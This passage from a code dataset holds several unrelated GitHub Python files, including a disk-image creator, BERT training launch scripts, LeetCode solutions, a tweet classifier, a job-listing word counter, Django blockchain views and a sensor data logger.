report(blocknum, blocksize, totalsize):\n progress.update(blocknum * blocksize - progress.pos)\n urllib.request.urlretrieve(asset.browser_download_url, Path(save_dir)/asset.name, reporthook=report)\n \n return asset.name\n","repo_name":"jinliu/arch-github-package","sub_path":"arch_github_package/gh.py","file_name":"gh.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21313710161","text":"import os\nfrom datetime import *\nimport random\nfrom classes.Disk_Classes import *\nfrom utils.Utils import *\nfrom classes.State import estado\ndef mkdisk_command(size_option, path_option, fit_option, unit_option):\n print(\"---------------------------------------\")\n print(\"Comando MKDISK en ejecucion con los siguientes parametros:\")\n print(f\"Size: {size_option}\")\n print(f\"Unit: {unit_option}\")\n print(f\"Fit: {fit_option}\")\n print(f\"Path: {path_option}\")\n if(int(size_option)>0):\n ruta_expandida = getPath(path_option)\n verifypath(str(ruta_expandida))\n \n with open(str(ruta_expandida), \"wb\") as file:\n num_zeros = getnum_zeros(size_option, unit_option) \n \n file.write(b'\\x00' * num_zeros)\n fit_mbr = getfit_mbr(str(fit_option))\n #obtener fecha\n fecha_actual = datetime.now()\n fecha_int = int(fecha_actual.strftime(\"%d%m%Y%H%M\"))\n \n # CREACION DE LAS CAUTRO PARTICIONES\n partition1 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition2 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition3 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition4 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n mbr_data = MBR(num_zeros, fecha_int, random.randint(0,100), fit_mbr, partition1, partition2, partition3, partition4)\n #empaquetar MBR y partitions\n mbr_datapack = mbr_data.pack()\n file.seek(0) \n file.write(mbr_datapack)\n print(\"Disco creado con exito\")\n estado.mensaje = \"¡Disco creado con exito!\"\n print(\"---------------------------------------\")\n elif(int(size_option)<=0):\n print(\"ERROR: El parametro size tiene que ser mayor a 0\")\n estado.mensaje = \"ERROR: El parametro size tiene que ser mayor a 0\"\n print(\"---------------------------------------\")\ndef getnum_zeros(size, unit):\n if(str(unit)==\"M\"):\n return (int(size)*1024*1024)\n elif(str(unit)==\"K\"):\n return (int(size)*1024)\n elif(str(unit)==\"B\"):\n return int(size)\n else:\n print(\"La unidad de medida es incorrecta\")\n estado.mensaje = \"ERROR: La unidad de medida es incorrecta\"\n\n\ndef getfit_mbr(fitop):\n if(fitop==\"FF\"):\n return \"F\"\n elif(fitop==\"BF\"):\n return \"B\"\n elif(fitop==\"WF\"):\n return \"W\"\n else:\n print(\"ERROR: Fit incorrecto\")\n estado.mensaje = \"ERROR: La unidad de medida es incorrecta\"\n","repo_name":"LestherLopez/-MIA-P2_202110897","sub_path":"Server/commands/mkdisk_command.py","file_name":"mkdisk_command.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6247778743","text":"import logging\nimport os\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n# model\nbert_base_model = \"~/bert-base-uncased.tar.gz\"\nbert_base_vocab = \"~/bert-base-uncased-vocab.txt\"\n# bert_large_model = \"../BERT/bert-large-uncased.tar.gz\"\n# bert_large_vocab = \"../BERT/bert-large-uncased-vocab.txt\"\n\ntrain_file = 'data/ms_marco_dp0.7/train-yesno-cb-dp70.json'\ndev_file = 'data/ms_marco_dp0.7/dev-yesno-cb-dp70.json'\n\ntask_name = 'marco-cb-dp0.7'\n\nreader_name = 'cb-marco'\n\nbert_name = 'mlp'\n\noutput_dir = f\"experiments/marco-cb-dp0.7/mlp/v1.0/\"\n\ncmd = f\"python main_0.6.2.py \\\n --bert_model bert-base-uncased \\\n --vocab_file {bert_base_vocab} \\\n --model_file {bert_base_model} \\\n --output_dir {output_dir} \\\n --predict_dir {output_dir} \\\n --train_file {train_file} \\\n --predict_file {dev_file} \\\n --max_seq_length 480 --max_query_length 50 \\\n --do_train --do_predict --train_batch_size 8 --predict_batch_size 8 --max_answer_length 15 \\\n --learning_rate 2e-5 \\\n --num_train_epochs 3.0 \\\n --max_ctx 3 \\\n --bert_name {bert_name} \\\n --task_name {task_name} \\\n --reader_name {reader_name} \"\n\nprint(cmd)\nos.system(cmd)\n\nbert_name = 'hie'\n\noutput_dir = f\"experiments/marco-cb-dp0.7/hie/v1.4/\"\n# Best performance\n\ncmd = f\"python main_0.6.2.py \\\n --bert_model bert-base-uncased \\\n --vocab_file {bert_base_vocab} \\\n --model_file {bert_base_model} \\\n --output_dir {output_dir} \\\n --predict_dir {output_dir} \\\n --train_file {train_file} \\\n --predict_file {dev_file} \\\n --max_seq_length 480 --max_query_length 50 \\\n --do_train --do_predict --train_batch_size 8 --predict_batch_size 8 --max_answer_length 15 \\\n --learning_rate 2e-5 \\\n --num_train_epochs 2.0 \\\n --max_ctx 3 \\\n --bert_name {bert_name} \\\n --task_name {task_name} \\\n --reader_name {reader_name} \" \\\n f\"--evidence_lambda 0.0\"\n\nprint(cmd)\nos.system(cmd)\n","repo_name":"SparkJiao/Self-Training-MRC","sub_path":"scripts/marco-cb-dp0.7-co-training/scratch1.0.py","file_name":"scratch1.0.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"10016455298","text":"from typing import Any, Dict, List, Union\n\nfrom typing_extensions import TypedDict\n\nfrom .types import (\n CompletionItem,\n CompletionList,\n Hover,\n MessageActionItem,\n ServerCapabilities,\n SymbolInformation,\n WorkspaceFolder,\n)\n\n\nclass _InitializeResult__Optional(TypedDict, total=False):\n serverInfo: Dict[str, Any] # lazy\n\n\nclass InitializeResult(_InitializeResult__Optional):\n capabilities: ServerCapabilities\n\n\nShutdownResult = Union[None]\n\n\nShowMessageResult = Union[MessageActionItem, None]\n\n\nclass WorkDoneProgressCreateResult(TypedDict):\n pass # this might be null\n\n\nWorkSpaceFoldersResult = Union[List[WorkspaceFolder], None]\n\n\nWorkspaceSymbolResult = Union[List[SymbolInformation], None]\n\n\nExecuteCommandResult = Union[Any, None]\n\n\nclass _ApplyWorkspaceEditResult__Optional(TypedDict, total=False):\n failureReason: str\n\n\nclass ApplyWorkspaceEditResult(_ApplyWorkspaceEditResult__Optional):\n applied: bool\n\n\nCompletionResult = Union[List[CompletionItem], CompletionList, None]\nCompletionItemResolveResult = CompletionItem\n\nHoverResult = Union[Hover, None]\n\nRegisterCapabilityResult = Union[None]\nUnRegisterCapabilityResult = Union[None]\nConfigurationResult = List[Any]\n","repo_name":"antdking/languageserver-python","sub_path":"languageserver/protocol/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5963265515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 1 11:33:33 2016\n\n@author: dong.qu\n\"\"\"\ndef removeDuplicates(nums):\n if not nums:\n return 0\n \n newTail = 0\n \n for i in range(1, len(nums)):\n if nums[i] != nums[newTail]:\n newTail += 1\n nums[newTail] = nums[i]\n \n return newTail + 1\n \n \nnums = [1,2,2,2,3,4,4,5]\nprint(removeDuplicates(nums))\nprint(nums)\n\ndef removeElement(nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n tail = 0\n for i in range(0,len(nums)):\n if nums[i] != val:\n nums[i], nums[tail] = nums[tail], nums[i]\n tail+=1\n \n return tail\n \nnums = [1,1,6,5,1,4,1,2]\nprint(removeElement(nums, 1))\nprint(nums)\n\ndef rotate(nums, k):\n kt = k % len(nums)\n km = len(nums)-kt\n print('km ', km)\n nums[:] = nums[km:]+nums[:km]\n \nnums = [1,2,3,4,5,6,7]\nrotate(nums, 3)\nprint(nums)\n\ndef mytest(nums):\n nums[:] =[]\n \ndef merge(nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if not (nums1 and nums2):\n nums1[:] = nums1+nums2\n else:\n rl = []\n k,j =0,0\n for i in range(m+n):\n if nums1[k] < nums2[j]:\n rl.append(nums1[k])\n k+=1\n if k==m:\n rl+=nums2[j:]\n break\n else:\n rl.append(nums2[j])\n j+=1\n if j==n:\n rl+=nums1[k:]\n break\n nums1[:] = rl\n \nnums1 = [1,4,6,7,8]\nm = len(nums1)\nnums2 = [2,3,6,8,10, 15]\nn = len(nums2)\n\nnums1 = [1,]\nm = len(nums1)\nnums2 = [2]\nn = len(nums2)\n\nmerge(nums1,m,nums2,n)\nprint(nums1)","repo_name":"qd452/Algorithm4","sub_path":"Leetcode/src/remove_duplicates_from_sorted_array.py","file_name":"remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"73568672746","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 15 00:07:58 2020\r\n\r\n@author: dibya\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport nltk\r\nnltk.download('stopwords')\r\nnltk.download('wordnet')\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import classification_report\r\n\r\ndf = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\train.csv\")\r\ndf.head()\r\ndf.shape\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\n##### EDA ###\r\nsns.countplot('target',data=df)\r\ndf['keyword'].value_counts()\r\n\r\ndata=df.drop(['location','keyword'],axis=1)\r\ndata.head()\r\n\r\n# Cleaning the reviews\r\n\r\ncorpus = []\r\nfor i in range(0,7613):\r\n\r\n # Cleaning special character from the tweets\r\n review = re.sub(pattern='[^a-zA-Z]',repl=' ', string=data['text'][i])#remove everything apart from capital A to Z and small a to z\r\n \r\n\r\n # Converting the entire tweets into lower case\r\n tweets = review.lower()\r\n\r\n # Tokenizing the tweetsby words\r\n tweets_words = tweets.split()\r\n \r\n # Removing the stop words\r\n tweets_words = [word for word in tweets_words if not word in set(stopwords.words('english'))]\r\n \r\n # lemmitizing the words\r\n lemmatizer = WordNetLemmatizer()\r\n tweets= [lemmatizer.lemmatize(word) for word in tweets_words]\r\n\r\n # Joining the lemmitized words\r\n tweets = ' '.join(tweets)\r\n \r\n # Creating a corpus\r\n corpus.append(tweets)\r\n \r\ncorpus[:5]\r\n\r\n## Convert Text To Machine Readable Form\r\ncv = CountVectorizer()\r\nX = cv.fit_transform(corpus).toarray()\r\ny = data['target']\r\nprint(X.shape)\r\n\r\n#splitting the dataset\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# Fitting Naive Bayes to the Training set\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nclassifier = MultinomialNB()\r\nclassifier.fit(X_train, y_train)\r\n\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\nprint(y_pred)\r\n\r\n#accurcy\r\naccuracy=confusion_matrix(y_test,y_pred )\r\nprint(\"confusion_matrix:\",accuracy)\r\n\r\naccuracy=accuracy_score(y_test,y_pred )\r\nprint(\"accuracy_score:\",accuracy)\r\n\r\nprint(classification_report(y_test,y_pred ))\r\n\r\n### test data\r\ntest = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\test.csv\")\r\nsubmit = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\sample_submission.csv\")\r\n\r\ntest.drop(['keyword','location'],axis=1,inplace=True)\r\n\r\n\r\ncorpus1 =[]\r\nfor i in range(0,3263):\r\n\r\n\r\n # Cleaning special character from the tweets\r\n review = re.sub(pattern='[^a-zA-Z]',repl=' ', string=test['text'][i])\r\n \r\n # Converting the entire tweets into lower case\r\n tweets = review.lower()\r\n\r\n # Tokenizing the tweets by words\r\n tweets_words = review.split()\r\n \r\n # Removing the stop words\r\n tweets_words = [word for word in tweets_words if not word in set(stopwords.words('english'))]\r\n \r\n # lemmitizing the words\r\n lemmatizer = WordNetLemmatizer()\r\n tweets = [lemmatizer.lemmatize(word) for word in tweets_words]\r\n\r\n # Joining the lemmitized words\r\n tweets = ' '.join(tweets)\r\n\r\n y_pred=cv.transform([review]).toarray()\r\n pre=classifier.predict(y_pred)\r\n corpus1.append(pre)\r\n\r\nprint(len(corpus1))\r\n\r\nsubmit['id'] = test['id']\r\nsubmit['target'] = corpus1\r\n# Let's convert our submission dataframe 'Survived' column to ints\r\nsubmit['target'] = submit['target'].astype(int)\r\n\r\n# for Kaggle submisison\r\nsubmit.to_csv('../submission_nlp1.csv', index=False)\r\nprint('Submission CSV is ready!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"dibyanjan-patra/Kaggle--NLP-with-Disaster-Tweets.-","sub_path":"naiveBayes_model.py","file_name":"naiveBayes_model.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30989438350","text":"# Prepare Text Data for Machine Learning with scikit-learn\r\n# Word Counts with CountVectorizer\r\n# from sklearn.feature_extraction.text import CountVectorizer\r\n# text = [\"The quick brown fox jumped over the lazy dog.\"]\r\n# vectorizer = CountVectorizer()\r\n# vectorizer.fit(text)\r\n# print(vectorizer.vocabulary_)\r\n# vector = vectorizer.transform(text)\r\n# print(vector.shape)\r\n# print(type(vector))\r\n# print(vector.toarray())\r\n# Word Frequencies with TfidfVectorizer\r\n# from sklearn.feature_extraction.text import TfidfVectorizer\r\n# text = [\"The quick brown fox jumped over the lazy dog.\",\r\n# \"The dog.\",\r\n# \"The fox\"]\r\n# vectorizer = TfidfVectorizer()\r\n# vectorizer.fit(text)\r\n# print(vectorizer.vocabulary_)\r\n# print(vectorizer.idf_)\r\n# vector = vectorizer.transform([text[0]])\r\n# print(vector.shape)\r\n# print(vector.toarray())\r\n\r\nfrom sklearn.feature_extraction.text import HashingVectorizer\r\ntext = [\"The quick brown fox jumped over the lazy dog.\"]\r\nvectorizer = HashingVectorizer(n_features=20)\r\nvector = vectorizer.transform(text)\r\nprint(vector.shape)\r\nprint(vector.toarray())","repo_name":"rg4592/text-representation","sub_path":"text_representation.py","file_name":"text_representation.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26614653693","text":"from collections import defaultdict\nS = input()\nn = len(S)\nresult = 0\n\ncnt = defaultdict(int)\n\n# 前の文字と、前の前の文字\nprev_c, prev2_c = \"\", \"\"\n\nfor i in range(len(S)-1, -1, -1):\n now_c = S[i]\n\n # 前と違う文字が二回連続で現れたら\n if now_c == prev_c != prev2_c:\n # そこから右がその文字に書き換えられるので、\n # 該当文字を除く文字数を答えに加算。\n result += (n - i - 1) - cnt[now_c]\n # カウントは全て書き変わった文字になる\n cnt = defaultdict(int, {now_c: len(S) - i - 1})\n cnt[now_c] += 1\n prev2_c, prev_c = prev_c, now_c\n\nprint(result)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-113/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28345892020","text":"#!/usr/bin/python3\r\nimport requests\r\nimport re\r\nfrom collections import Counter\r\n\r\nAPI_URL = 'https://api.hh.ru/vacancies/'\r\nVACANCY = 'python developer'\r\nAREA_NUMBER = 1\r\nPER_PAGE = '100'\r\nPAGES = 21\r\n\r\ndef get_ids(url, vacancy, area_number):\r\n ids = []\r\n try:\r\n for page in range(PAGES):\r\n param = {'text': vacancy, 'area': area_number,\r\n 'per_page': PER_PAGE, 'page': str(page)}\r\n r = requests.get(url, param).json()\r\n for i in r['items']:\r\n ids.append(i['id'])\r\n except KeyError:\r\n pass\r\n finally:\r\n return ids\r\n\r\ndef get_descriptions_from_url(url, ids):\r\n descriptions = []\r\n for id in ids:\r\n id_url = url + id\r\n print(id_url)\r\n r = requests.get(id_url).json()\r\n descriptions.append(r['description'])\r\n return descriptions\r\n\r\ndef get_text_from_html(html):\r\n text = []\r\n for i in html:\r\n text.append(re.sub('<.*?>', '', i))\r\n return text\r\n\r\ndef normalize_text(text):\r\n norm_text = []\r\n skips_1 = [\".\", \",\", \":\", \";\", \"'\", '\"', \"(\", \")\", \"!\", \"«\", \"»\", \r\n \"?\", \"•\", \"·\"]\r\n skips_2 = [\"/\", \"\\\\\", \"\\\\\\\\\", \" \", \" \", \"-\", \"–\"]\r\n for i in text:\r\n i = i.lower()\r\n for char in skips_1:\r\n i = i.replace(char, \"\")\r\n for char in skips_2:\r\n i = i.replace(char, \" \")\r\n norm_text.append(i)\r\n return norm_text\r\n\r\ndef count_words(text):\r\n word_counts = Counter(text.split(\" \")).most_common(500)\r\n return word_counts\r\n\r\ndef get_string_from_lists(list):\r\n descriptions_str = ' '.join(list)\r\n return descriptions_str\r\n\r\ndef main():\r\n ids = get_ids(API_URL, VACANCY, AREA_NUMBER)\r\n print(len(ids))\r\n descriptions = get_descriptions_from_url(API_URL, ids)\r\n descriptions = get_text_from_html(descriptions)\r\n descriptions = normalize_text(descriptions)\r\n print(descriptions)\r\n descriptions_str = get_string_from_lists(descriptions)\r\n word_counts = count_words(descriptions_str)\r\n normal_words = []\r\n for i in word_counts:\r\n if len(i[0]) >= 3:\r\n normal_words.append(i)\r\n print(normal_words)\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n exit(main())\r\n","repo_name":"greyels/hh-parser","sub_path":"hh_job_parser.py","file_name":"hh_job_parser.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73284684266","text":"import json\nimport hashlib\nimport base64\nfrom ecdsa import BadSignatureError, SECP256k1, SigningKey, VerifyingKey\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .models import *\nfrom .forms import *\nimport json\nfrom .blockchain import Blockchain\n\n\n@login_required(login_url=\"login\")\ndef transaction(request):\n profile = request.user.profile\n name = request.user.first_name\n email = request.user.email\n form_transaction = TransactionForm(instance=profile)\n \n \n \n \n if request.method == \"POST\" and 'button1' in request.POST:\n form = TransactionForm(request.POST)\n if form.is_valid():\n rekodharga = form.save(commit=False)\n rekodharga.owner = profile\n rekodharga.save()\n newblock = create_block(rekodharga, profile)\n rekodharga.data_hash = newblock\n rekodharga.save()\n return redirect('transaction')\n\n record_list = profile.rekodharga_set.all()\n context = {\n 'record_list' : record_list,\n 'form_transaction' : form_transaction,\n 'name': name,\n 'email': email,\n }\n return render(request, 'dashboard/transaction.html', context)\n\n\ndef create_block(rekodharga, profile):\n previous_block = RekodBlokchain.objects.latest('timestamp')\n # Get from the user profile the public and private key\n vk_string = profile.public_key # signing key\n sk_string = profile.private_key # verifying key\n \n \n # Store all transaction information into dict\n temp_dict = {\n 'company_name_buy': rekodharga.company_name_buy,\n 'item_type': rekodharga.item_type,\n 'quantity': rekodharga.quantity,\n 'purchase_price': rekodharga.purchase_price,\n }\n\n # Get previous hash from previous block\n prev_hash = previous_block.hash_id\n\n encoded_data = json.dumps(temp_dict).encode()\n # Convert encoded data to data hash value and store in block\n data_hash = hashlib.sha256(encoded_data).hexdigest()\n\n # Signing the block using SECP256k1 elliptic curve\n sk = SigningKey.from_string(sk_string, curve=SECP256k1)\n vk = VerifyingKey.from_string(vk_string, curve=SECP256k1)\n\n # Get the digital singature and store value in block\n digital_signature = sk.sign(encoded_data)\n\n # Get previous proof from pervious block\n previous_proof = previous_block.nonce\n\n # Get the proof of work for this block\n nonce, hash_id = _proof_of_work(previous_proof, data_hash)\n\n newblock = RekodBlokchain.objects.create(\n prev_hash = prev_hash,\n data_hash = data_hash,\n data_signature = digital_signature,\n public_key = vk_string,\n nonce = nonce,\n hash_id = hash_id,\n flag_status= False\n )\n \n return newblock\n \n\ndef _to_digest(\n new_proof: int, previous_proof: int, data: str\n ) -> bytes:\n to_digest = str(new_proof ** 2 - previous_proof ** 2 + 2) + data\n # It returns an utf-8 encoded version of the string\n return to_digest.encode()\n\n\ndef _proof_of_work(previous_proof: str, data: str) -> int:\n new_proof = 1\n check_proof = False\n hash_id = ''\n while not check_proof:\n to_digest = _to_digest(new_proof, previous_proof, data)\n hash_operation = hashlib.sha256(to_digest).hexdigest()\n if hash_operation[:4] == \"0000\":\n check_proof = True\n hash_id = hash_operation\n else:\n new_proof += 1\n\n return new_proof, hash_id\n\n\n@login_required(login_url=\"login\")\ndef blockchain(request):\n # RekodBlokchain.objects.all().delete()\n # Blockchain universal rekod asing\n profile = request.user.profile\n name = request.user.first_name\n email = request.user.email\n recordblockchain_list = RekodBlokchain.objects.all()\n print(recordblockchain_list)\n context = {\n 'recordblockchain_list' : recordblockchain_list,\n 'name': name,\n 'email': email,\n }\n return render(request, 'dashboard/blockchain.html', context)\n \n@login_required(login_url=\"login\")\ndef block_detail(request, pk=None):\n \n profile = request.user.profile\n name = request.user.first_name\n email = request.user.email\n try:\n detail_block = RekodBlokchain.objects.get(id=pk)\n except ObjectDoesNotExist:\n print(\"Error!\")\n \n if detail_block.data_signature == None:\n digital_signature_base64 = None\n else:\n digital_signature_base64 = base64.b64encode(detail_block.data_signature).decode()\n \n if detail_block.public_key == None:\n public_key = None\n else:\n public_key = base64.b64encode(detail_block.public_key).decode()\n\n context = {\n 'detail_block' : detail_block,\n 'digital_signature_base64': digital_signature_base64,\n 'public_key': public_key,\n 'name': name,\n 'email': email,\n }\n return render(request, 'dashboard/blockchain_detail.html', context)\n\n@login_required(login_url=\"login\")\ndef validate_block(request):\n profile = request.user.profile\n name = request.user.first_name\n email = request.user.email\n # vk_string = profile.public_key\n # Queryset for rekod harga\n listRecord = RekodHarga.objects.all()\n # Queryset for recordblokchain\n recordblockchain_queryset = RekodBlokchain.objects.all()\n print(recordblockchain_queryset)\n print(\"\\n\")\n # Change recordblokchain queryset to list\n recordblockchain_list = list(recordblockchain_queryset)\n # Remove genisis block from the list\n recordblockchain_list.pop(0)\n\n index = 0\n for x in recordblockchain_list:\n status = True\n id = x.id\n for y in listRecord:\n temp_dict = {\n 'company_name_buy': y.company_name_buy,\n 'item_type': y.item_type,\n 'quantity': y.quantity,\n 'purchase_price': y.purchase_price,\n }\n encoded_data = json.dumps(temp_dict).encode()\n data_hash = hashlib.sha256(encoded_data).hexdigest()\n print(\"Comparing \" + str(data_hash) + \" with \" + x.data_hash)\n if data_hash == x.data_hash:\n vk = VerifyingKey.from_string(x.public_key, curve=SECP256k1)\n try:\n if vk.verify(x.data_signature, encoded_data):\n status = False\n break\n except BadSignatureError:\n print(data_hash)\n print(\"Bad Signature!\\n\")\n # if sign_status:\n # status = False\n # break\n if status:\n change_flag_status(id, status)\n print(\"Block #\" + str(index + 2) + \" data has changed\")\n else:\n change_flag_status(id, status)\n print(\"Block #\" + str(index + 2) + \" still maintain the same\")\n index += 1\n \n recordblockchain_list = RekodBlokchain.objects.all()\n context = {\n 'recordblockchain_list' : recordblockchain_list,\n 'name': name,\n 'email': email,\n }\n return render(request, 'dashboard/blockchain.html', context)\n\ndef change_flag_status(id, status):\n blok = RekodBlokchain.objects.get(id=id)\n blok.flag_status = status\n blok.save()","repo_name":"froxity/SSB","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067034978","text":"import requests\r\nimport sys\r\nimport json # for presenting the API in JSON format\r\n\r\n\r\ntry: # checks that input is a number or decimal\r\n if len(sys.argv) == 2 and sys.argv[1].isalpha() == False:\r\n # request API and output of it\r\n bitcoin = requests.get(\"https://api.coindesk.com/v1/bpi/currentprice.json\")\r\n # converts to 2nd argument or the number to a float\r\n t = float(sys.argv[1])\r\n\r\n # finds the rate of a float and converts it to an integer\r\n b = bitcoin.json()\r\n b = float(b[\"bpi\"][\"USD\"][\"rate_float\"])\r\n\r\n # exception if the request is not successful or if the index for commandline argument is out of range\r\nexcept (requests.RequestException, IndexError):\r\n print(\"Missing command-line argument\")\r\n sys.exit()\r\n\r\n # if the command line argument is not a number or decimal\r\nexcept ValueError:\r\n print(\"command-line argument is not a number\")\r\n sys.exit()\r\n # formatting for the number to have commas for each thousandth and up and also to display up to the 4th decimal place\r\nelse:\r\n print(f\"${t * b:,.4f}\")\r\n","repo_name":"Adamb0lt/CS50","sub_path":"CS50p/week4_libraries/bitcoin/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6134933248","text":"import pickle\n\nif __name__=='__main__':\n\n park_info = {}\n park_info['east_mount_falcon'] = {'pretty_name':'East Mount Falcon', 'lat':39.646865, 'lon':-105.196314, 'capacity': 49}\n park_info['east_three_sisters'] = {'pretty_name':'East Three Sisters', 'lat':39.623484, 'lon':-105.345841, 'capacity':26}\n park_info['east_white_ranch'] = {'pretty_name':'East White Ranch', 'lat':39.798109, 'lon':-105.246799, 'capacity':51}\n park_info['lair_o_the_bear'] = {'pretty_name':\"Lair O' The Bear\", 'lat':39.665616, 'lon':-105.258430, 'capacity':97}\n park_info['mount_galbraith'] = {'pretty_name':'Mount Galbraith', 'lat':39.774085, 'lon':-105.253516, 'capacity':27}\n park_info['west_mount_falcon'] = {'pretty_name':'West Mount Falcon', 'lat':39.637136, 'lon':-105.239178, 'capacity':62}\n park_info['west_three_sisters'] = {'pretty_name':'West Three Sisters', 'lat':39.624941, 'lon':-105.360398, 'capacity':49}\n\n with open('./data/park_info.pkl', 'wb') as f:\n pickle.dump(park_info, f)","repo_name":"andypicke/JeffCo-OpenSpace-LotSpot-Analysis","sub_path":"src/make_park_info.py","file_name":"make_park_info.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29299949039","text":"# Write a Python program to get the maximum and minimum value in a dictionary. \nd={1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n\n \n# get key with min value\nmin_key = min(d, key=d.get)\n\n#get the key with max value\nmax_key=max(d,key=d.get)\n\n\nprint(\"maximum value in the dictionary\",d.get(max_key))\nprint(\"minimum value in the dictionary\",d.get(min_key))\n\n","repo_name":"hash-eer/python-assignment-3","sub_path":"python assignment 3 dict/prog12.py","file_name":"prog12.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40427462217","text":"import csv\nimport time\n\nfrom data_filter import DataFilter\nfrom sensors import Accelerometer, Altimeter, IMU\nfrom utils import HEADERS\n\n\nclass DataLogger:\n def __init__(self, name: str, accelerometer: Accelerometer, altimeter: Altimeter, imu: IMU, dfilter: DataFilter):\n self.name = name\n self.file = open(name, \"w\")\n self.samples = 0\n self.accelerometer = accelerometer\n self.altimeter = altimeter\n self.imu = imu\n self.dfilter = dfilter\n\n self._initialize_csv()\n\n def _initialize_csv(self):\n csv.writer(self.file).writerow(HEADERS)\n\n def log_sensors(self):\n acceleration_acce_x, acceleration_acce_y, acceleration_acce_z = self.accelerometer.acceleration_acce\n altitude = self.altimeter.altitude\n acceleration_imu_x, acceleration_imu_y, acceleration_imu_z = self.imu.acceleration_imu\n linacceleration_imu_x, linacceleration_imu_y, linacceleration_imu_z = self.imu.linacceleration_imu\n eulerangle_imu_x, eulerangle_imu_y, eulerangle_imu_z = self.imu.eulerangle_imu\n gravity_imu_x, gravity_imu_y, gravity_imu_z = self.imu.gravity_imu\n\n self.dfilter.filter_data(altitude, acceleration_acce_z, linacceleration_imu_z, eulerangle_imu_z)\n kalman_acceleration = self.dfilter.kalman_acceleration\n kalman_velocity = self.dfilter.kalman_velocity\n kalman_altitude = self.dfilter.kalman_altitude\n orientation_beta = self.dfilter.orientation_beta\n\n row = [\n \"%.4f\" % time.time(), # sensors.curr_time,\n \"%.4f\" % acceleration_acce_x,\n \"%.4f\" % acceleration_acce_y,\n \"%.4f\" % acceleration_acce_z,\n \"%.4f\" % altitude,\n \"%.4f\" % acceleration_imu_x,\n \"%.4f\" % acceleration_imu_y,\n \"%.4f\" % acceleration_imu_z,\n \"%.4f\" % linacceleration_imu_x,\n \"%.4f\" % linacceleration_imu_y,\n \"%.4f\" % linacceleration_imu_z,\n \"%.4f\" % eulerangle_imu_x,\n \"%.4f\" % eulerangle_imu_y,\n \"%.4f\" % eulerangle_imu_z,\n \"%.4f\" % gravity_imu_x,\n \"%.4f\" % gravity_imu_y,\n \"%.4f\" % gravity_imu_z,\n \"%.4f\" % kalman_acceleration, # data_filter.kalman_acceleration,\n \"%.4f\" 